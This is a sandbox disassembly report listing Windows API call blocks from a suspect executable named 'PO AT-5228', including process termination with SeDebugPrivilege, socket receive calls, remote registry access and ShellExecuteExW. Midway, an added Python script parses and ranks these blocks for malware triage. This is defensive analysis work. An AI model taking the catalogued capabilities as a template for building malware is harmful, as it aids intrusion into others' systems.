• GetCurrentProcess.KERNEL32(00B9AEF1,00000000,?,00B9AEF1,00000B00,?,?), ref: 00B9B2AB
• DuplicateHandle.KERNEL32(00000000,?,00B9AEF1,00000B00,?,?), ref: 00B9B2AE
• CreateThread.KERNEL32(00000000,00000000,00B9B2D4,00000000,00000000,00000000), ref: 00B9B2C8
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: bcb7fcc7540ba4053e71b3e646eb279211f2f79a2734d6b185f3f6ceb16551b9
• Instruction ID: e223da09781a18ea3904e7932b6a8aa426c268cfeca2bbc4a175a2c0c09b0ecc
• Opcode Fuzzy Hash: bcb7fcc7540ba4053e71b3e646eb279211f2f79a2734d6b185f3f6ceb16551b9
• Instruction Fuzzy Hash: 9B01BBB5240344BFE710ABA5DD89F6B7BACEB88711F018411FA15DF1A1CAB59800CB65
Strings
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
• Opcode ID: 9985104ebbe876544f4b57378f3f9b6a726edf4047d4a3420d74cc335412d5f6
• Instruction ID: b3e71f9d61477a6aefe21c7ac99c1fd5cc19ccbff9bc3ca798818acb5a33aa18
• Opcode Fuzzy Hash: 9985104ebbe876544f4b57378f3f9b6a726edf4047d4a3420d74cc335412d5f6
• Instruction Fuzzy Hash: C5E19071A00219AFDF14DFA8D885AFE7BF5EF58314F1480A9F915AB281D7B0AD41CB90
APIs
Strings
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2862541840-625585964
• Opcode ID: 8e8a400fc151a583f7295896a40e0ebbda5c9ad4be4bc03374710f8afc84f5da
• Instruction ID: 9761e5cd01af3c1ffb6e9a4e272615de6936721d789915b6069c1f4f837265e2
• Opcode Fuzzy Hash: 8e8a400fc151a583f7295896a40e0ebbda5c9ad4be4bc03374710f8afc84f5da
• Instruction Fuzzy Hash: 44919171A00215ABDF24CF95C884FEEBBF8EF45710F1085A9F515AB290DBF49945CB90
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00BC9B19
• SendMessageW.USER32(?,00001036,00000000,?), ref: 00BC9B2D
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00BC9B47
• _wcscat.LIBCMT ref: 00BC9BA2
• SendMessageW.USER32(?,00001057,00000000,?), ref: 00BC9BB9
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 00BC9BE7
Strings
Similarity
• API ID: MessageSend$Window_wcscat
• String ID: SysListView32
• API String ID: 307300125-78025650
• Opcode ID: eb217a6c975df474a9c4be90f0dc0ae848676d11604f6f079308e95d80548dc7
• Instruction ID: 782c34f17722b34972d95cb37ede5d870111b6eee818baf1f546256f7a2ec3d3
• Opcode Fuzzy Hash: eb217a6c975df474a9c4be90f0dc0ae848676d11604f6f079308e95d80548dc7
• Instruction Fuzzy Hash: 12419071900348AFEB219FA4DC89FEE77E8EF08350F1045AAF549A7291D6B19D84CB60
APIs
  • Part of subcall function 00BA6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00BA6554
  • Part of subcall function 00BA6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00BA6564
  • Part of subcall function 00BA6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00BA65F9
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BC179A
• GetLastError.KERNEL32 ref: 00BC17AD
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BC17D9
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00BC1855
• GetLastError.KERNEL32(00000000), ref: 00BC1860
• CloseHandle.KERNEL32(00000000), ref: 00BC1895
Strings
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
• Opcode ID: f8f76b8ee193a9c326da488de74c1f1868759620309b067362972140a94e0d16
• Instruction ID: 915eb8df5b6379247e076585c1699962d6fa6136454e933b00b47381e1f2b4ea
• Opcode Fuzzy Hash: f8f76b8ee193a9c326da488de74c1f1868759620309b067362972140a94e0d16
• Instruction Fuzzy Hash: 04419B71604200AFDB05EF68C8E5F6DB7E5EF55700F04849DF906AF282DBB9A9048B95
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 00BA58B8
Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoad
                                                                                        • String ID: blank$info$question$stop$warning
                                                                                        • API String ID: 2457776203-404129466
                                                                                        • Opcode ID: c4fe4278d8faac102446db455aaff6f59a09624a44f3807444c31dfd3ef27ffe
                                                                                        • Instruction ID: 0e270f6251987577040b44d3d14adcf82e742928ecc36ebe68c798bbb7ce190f
                                                                                        • Opcode Fuzzy Hash: c4fe4278d8faac102446db455aaff6f59a09624a44f3807444c31dfd3ef27ffe
                                                                                        • Instruction Fuzzy Hash: C911EE7230D742BAE7216B549C82DAE23DCEF17354B2000BAF640A6281E7A89B405264
                                                                                        APIs
                                                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00BAA806
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArraySafeVartype
                                                                                        • String ID:
                                                                                        • API String ID: 1725837607-0
                                                                                        • Opcode ID: 1634baa97eef771927cbc17e996d90081ff45c4531587c2aceec184b2b439feb
                                                                                        • Instruction ID: e319d91088924f29c8e6c2881ae07b0981255959359ee2b76a998b0d449b1f2a
                                                                                        • Opcode Fuzzy Hash: 1634baa97eef771927cbc17e996d90081ff45c4531587c2aceec184b2b439feb
                                                                                        • Instruction Fuzzy Hash: F3C1707590821ADFDB00DF94D481BAEB7F4FF0A315F2084AAE615E7381D735A941CBA1
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00BA6B63
                                                                                        • LoadStringW.USER32(00000000), ref: 00BA6B6A
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00BA6B80
                                                                                        • LoadStringW.USER32(00000000), ref: 00BA6B87
                                                                                        • _wprintf.LIBCMT ref: 00BA6BAD
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BA6BCB
                                                                                        Strings
                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00BA6BA8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                        • API String ID: 3648134473-3128320259
                                                                                        • Opcode ID: 7cbd368defaf16f06f5e4435b782cc112ef480e3a70ae392b4b6defb1cb5d6eb
                                                                                        • Instruction ID: 07c810669c2139e377936e21f45946f0e68c20a4ccc10af64dbf950b9029f888
                                                                                        • Opcode Fuzzy Hash: 7cbd368defaf16f06f5e4435b782cc112ef480e3a70ae392b4b6defb1cb5d6eb
                                                                                        • Instruction Fuzzy Hash: 85014FF2500248BFEB11A7949DC9EE633ACEB04304F4044A5B745EA051EAB4DE848F71
                                                                                        APIs
                                                                                          • Part of subcall function 00BC3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BC2BB5,?,?), ref: 00BC3C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BC2BF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharConnectRegistryUpper
                                                                                        • String ID:
                                                                                        • API String ID: 2595220575-0
                                                                                        • Opcode ID: 76212c43f434218e5fd4daec3e79f6a09df329365a0fc37c125a1b2756f8d705
                                                                                        • Instruction ID: 643f6c44307bde709ebc618b486164e470853fbdc9fdab1b758e4b3fa79f59c5
                                                                                        • Opcode Fuzzy Hash: 76212c43f434218e5fd4daec3e79f6a09df329365a0fc37c125a1b2756f8d705
                                                                                        • Instruction Fuzzy Hash: 0E916E716042019FCB01EF54C891F6EBBE5FF58310F04889DF9969B2A2DB75E945CB42
                                                                                        APIs
                                                                                        • select.WSOCK32 ref: 00BB9691
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00BB969E
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00BB96C8
                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00BB96E9
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00BB96F8
                                                                                        • inet_ntoa.WSOCK32(?), ref: 00BB9765
                                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00BB97AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$htonsinet_ntoaselect
                                                                                        • String ID:
                                                                                        • API String ID: 500251541-0
                                                                                        • Opcode ID: d2f0acc830d01662803f3c2de6f743ac29ccc2d1453cd4a64d7d0153cc3b57a2
                                                                                        • Instruction ID: 39491b6b5309cd660357c6619ab6f48ee5b7aa5ae89b4ea2ed97655174dbe959
                                                                                        • Opcode Fuzzy Hash: d2f0acc830d01662803f3c2de6f743ac29ccc2d1453cd4a64d7d0153cc3b57a2
                                                                                        • Instruction Fuzzy Hash: 0371CC31504240AFC710EF64CC85EABB7E8EF85714F104A9DF5569B2A1EBB0DD04CB92
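Reading a run of blocks like the ones above by hand does not scale: the IDA plugin emits one block per function, and most of them (LoadIconW, CreateFontW, critical-section setup, _wcscpy) belong to the script interpreter's own runtime rather than to anything the script does. The Python below is an added example, not part of the Joe Sandbox report or of its tooling. It parses the APIs / Strings / Similarity blocks in exactly the layout printed on this page and ranks each function by the API families it touches, so the Winsock block directly above (select, __WSAFDIsSet, #17, inet_ntoa, htons) and the earlier block that pairs the SeDebugPrivilege string with the Toolhelp32 / OpenProcess / TerminateProcess family sort to the top while MessageBox and font code sinks. The rule weights, the tag names and the partial wsock32 ordinal table are my own assumptions, and the sample text is constructed from lines copied out of the blocks on this page. One check worth making before trusting a block like this one: `#17.WSOCK32` is an import by ordinal, and in the wsock32.dll export table ordinal 17 is recvfrom, which fits the six arguments printed for it, with the trailing 00000010 (sizeof sockaddr_in) as the address-length parameter, so this function is a datagram (UDP) receive path.

```python
# Added example, not part of the Joe Sandbox report or its tooling. Parses the
# "APIs" / "Strings" / "Similarity" blocks in this page's layout, resolves
# wsock32 imports-by-ordinal and ranks each function by the API families used.
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Constructed input copied from blocks on this page; the last block has no APIs part.
SAMPLE = """\
APIs
• select.WSOCK32 ref: 00BB9691
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00BB96E9
• inet_ntoa.WSOCK32(?), ref: 00BB9765
Memory Dump Source
Similarity
• Opcode ID: d2f0acc830d01662803f3c2de6f743ac29ccc2d1453cd4a64d7d0153cc3b57a2
APIs
• _wprintf.LIBCMT ref: 00BA6BAD
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BA6BCB
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00BA6BA8
Similarity
• Opcode ID: 7cbd368defaf16f06f5e4435b782cc112ef480e3a70ae392b4b6defb1cb5d6eb
APIs
  • Part of subcall function 00BC3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BC2BB5,?,?), ref: 00BC3C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BC2BF6
Similarity
• Opcode ID: 76212c43f434218e5fd4daec3e79f6a09df329365a0fc37c125a1b2756f8d705
Memory Dump Source
"""
# Partial wsock32.dll export-ordinal table (Winsock 1.1 order) for "#NN.WSOCK32"
# entries; assumed knowledge on my part, not data taken from the report.
WSOCK32_ORDINALS = {1: "accept", 2: "bind", 3: "closesocket", 4: "connect",
                    9: "htons", 13: "listen", 16: "recv", 17: "recvfrom",
                    18: "select", 19: "send", 20: "sendto", 23: "socket"}
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
                    r"(?P<name>[#\w]+)\.(?P<mod>\w+)"
                    r"(?:\((?P<args>[^)]*)\),)? ref: (?P<ref>[0-9A-F]+)$")
STR_RE = re.compile(r"^(?P<s>.*), xrefs: [0-9A-F]+$")
OPCODE_RE = re.compile(r"^Opcode ID: (?P<id>[0-9a-f]{64})$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Similarity", "Joe Sandbox IDA Plugin"}
# indirect: reached via "Part of subcall function"; resolved: ordinal mapped to a name
ApiCall = namedtuple("ApiCall", "name module args ref indirect resolved")

@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    opcode_id: str = ""
    closed: bool = False  # set once the block's "Similarity" section is seen

def parse_blocks(text):
    """One FunctionBlock per function, in report order."""
    blocks, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            # "APIs" opens a block; a block without API calls opens at "Memory
            # Dump Source" once the previous block has reached "Similarity".
            if line == "APIs" or (line == "Memory Dump Source"
                                  and (not blocks or blocks[-1].closed)):
                blocks.append(FunctionBlock())
            if line == "Similarity" and blocks:
                blocks[-1].closed = True
            section = line
            continue
        if not blocks or not line.startswith("•"):
            continue
        item, blk = line[1:].strip(), blocks[-1]
        if section == "APIs" and (m := API_RE.match(item)):
            name, mod, resolved = m["name"], m["mod"], m["name"]
            if name.startswith("#") and mod.upper() == "WSOCK32":
                resolved = WSOCK32_ORDINALS.get(int(name[1:]), name)
            blk.apis.append(ApiCall(name, mod, m["args"] or "", m["ref"],
                                    m["sub"] is not None, resolved))
        elif section == "Strings" and (m := STR_RE.match(item)):
            blk.strings.append(m["s"])
        elif section == "Similarity" and (m := OPCODE_RE.match(item)):
            blk.opcode_id = m["id"]
    return blocks

# Heuristic rules (tag, weight, predicate): my own weighting, not a Joe Sandbox
# score. USER32 scores negative because here it is the interpreter's own GUI.
NET = {"WSOCK32", "WS2_32", "WININET", "WINHTTP"}
PROC = {"OpenProcess", "TerminateProcess", "CreateToolhelp32Snapshot", "Process32FirstW"}
RULES = [("network", 3, lambda c: c.module.upper() in NET),
         ("process", 3, lambda c: c.resolved in PROC),
         ("registry", 2, lambda c: c.resolved.startswith("Reg")),
         ("gui", -1, lambda c: c.module.upper() == "USER32")]

def score_block(blk):
    """(score, sorted tags); subcall-only hits keep the tag but add no points."""
    total, tags = 0, set()
    for call in blk.apis:
        for tag, weight, pred in RULES:
            if pred(call):
                tags.add(tag)
                total += 0 if call.indirect else weight
    if any("SeDebugPrivilege" in s for s in blk.strings):  # string evidence
        tags.add("privilege")
        total += 4
    return total, sorted(tags)

def triage(text):
    """Blocks ranked highest score first."""
    rows = [{"score": s, "tags": t, "opcode_id": b.opcode_id[:12],
             "apis": [c.resolved for c in b.apis]}
            for b in parse_blocks(text) for s, t in [score_block(b)]]
    return sorted(rows, key=lambda r: r["score"], reverse=True)
```

To triage the whole report, save the page as text and pass it to triage(); the top rows are the functions worth opening in IDA. Calls listed under "Part of subcall function" are tagged but not scored, so a caller is ranked on what it does itself rather than on a helper's noise, and a block that has no APIs section still gets its own entry instead of overwriting the previous function's Opcode ID.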
                                                                                        APIs
                                                                                        • __mtinitlocknum.LIBCMT ref: 00B8A991
                                                                                          • Part of subcall function 00B87D7C: __FF_MSGBANNER.LIBCMT ref: 00B87D91
                                                                                          • Part of subcall function 00B87D7C: __NMSG_WRITE.LIBCMT ref: 00B87D98
                                                                                          • Part of subcall function 00B87D7C: __malloc_crt.LIBCMT ref: 00B87DB8
                                                                                        • __lock.LIBCMT ref: 00B8A9A4
                                                                                        • __lock.LIBCMT ref: 00B8A9F0
                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00C16DE0,00000018,00B95E7B,?,00000000,00000109), ref: 00B8AA0C
                                                                                        • EnterCriticalSection.KERNEL32(8000000C,00C16DE0,00000018,00B95E7B,?,00000000,00000109), ref: 00B8AA29
                                                                                        • LeaveCriticalSection.KERNEL32(8000000C), ref: 00B8AA39
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 1422805418-0
                                                                                        • Opcode ID: 92fe18c120e26487152d34aab2c0271cad68f5cdc4ebbba37bb87a551db9f25d
                                                                                        • Instruction ID: 2d425eaaa2a45c4a2fd80891501fbe3f63036b6101ebbd8970a3e61f7bc0a2f9
                                                                                        • Opcode Fuzzy Hash: 92fe18c120e26487152d34aab2c0271cad68f5cdc4ebbba37bb87a551db9f25d
                                                                                        • Instruction Fuzzy Hash: A8412D719002059BFB28BF68D98575CB7F0EF01335F20439AE425AB5F1DBB49941CB92
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 00BC8EE4
                                                                                        • GetDC.USER32(00000000), ref: 00BC8EEC
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BC8EF7
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00BC8F03
                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00BC8F3F
                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BC8F50
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00BCBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00BC8F8A
                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00BC8FAA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3864802216-0
                                                                                        • Opcode ID: 2edabddd1895c7ea0d2f462bf22269f658ebfdc9d8606f390406b9713b041a23
                                                                                        • Instruction ID: 0d7023ba58cf755422c0a0536f42cc46a95902eacb5b0f2f9adab2536117795b
                                                                                        • Opcode Fuzzy Hash: 2edabddd1895c7ea0d2f462bf22269f658ebfdc9d8606f390406b9713b041a23
                                                                                        • Instruction Fuzzy Hash: FD314D72100254BFEB118F50CC89FEA3BA9EF49755F084069FE099F191DAB59841CBB4
                                                                                        APIs
                                                                                          • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                                                          • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                                                          • Part of subcall function 00B7C6F4: _wcscpy.LIBCMT ref: 00B7C717
                                                                                        • _wcstok.LIBCMT ref: 00BB184E
                                                                                        • _wcscpy.LIBCMT ref: 00BB18DD
                                                                                        • _memset.LIBCMT ref: 00BB1910
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                        • String ID: X
                                                                                        • API String ID: 774024439-3081909835
                                                                                        • Opcode ID: 5631ff50a0e490631b75741be2fcb0b5b25a9fb4e9d3088d6a2373d49e54c455
                                                                                        • Instruction ID: 37f762ec430198dd92c85e782281b83ed2f93ab3ade47f1ae4621b261ea6c982
                                                                                        • Opcode Fuzzy Hash: 5631ff50a0e490631b75741be2fcb0b5b25a9fb4e9d3088d6a2373d49e54c455
                                                                                        • Instruction Fuzzy Hash: 83C1A1716043409FC724EF28C991AAEB7E4FF85350F4449ADF899972A2DB70ED45CB82
                                                                                        APIs
                                                                                          • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00BD016D
                                                                                        • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00BD038D
                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00BD03AB
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00BD03D6
                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00BD03FF
                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 00BD0421
                                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00BD0440
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                        • String ID:
                                                                                        • API String ID: 3356174886-0
                                                                                        • Opcode ID: f6048382b0a9bae9198ad24df827fc218c0e45d577f8ef568bec8badb06db692
                                                                                        • Instruction ID: 44ac1223ffadb83be157387b9ef3921029997d9e898515d73e9286365158dca7
                                                                                        • Opcode Fuzzy Hash: f6048382b0a9bae9198ad24df827fc218c0e45d577f8ef568bec8badb06db692
                                                                                        • Instruction Fuzzy Hash: 99A17C35610616AFDB18DF68C9857ADFBF1FB48710F048196EC54AB390E774AD50CB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b2079cc878baba11460231c530b0951913362f15c64327f58d9559d235a8f563
                                                                                        • Instruction ID: ff44896d098520b86bac65bac8a4deb452b5ceec74d6ef009eac2a92cafb7e95
                                                                                        • Opcode Fuzzy Hash: b2079cc878baba11460231c530b0951913362f15c64327f58d9559d235a8f563
                                                                                        • Instruction Fuzzy Hash: 6E715C71904109AFCB14DF98CC85AAEBBB4FF85314F14C199F929AB251D730AA41CF65
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BC225A
                                                                                        • _memset.LIBCMT ref: 00BC2323
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00BC2368
                                                                                          • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                                                          • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
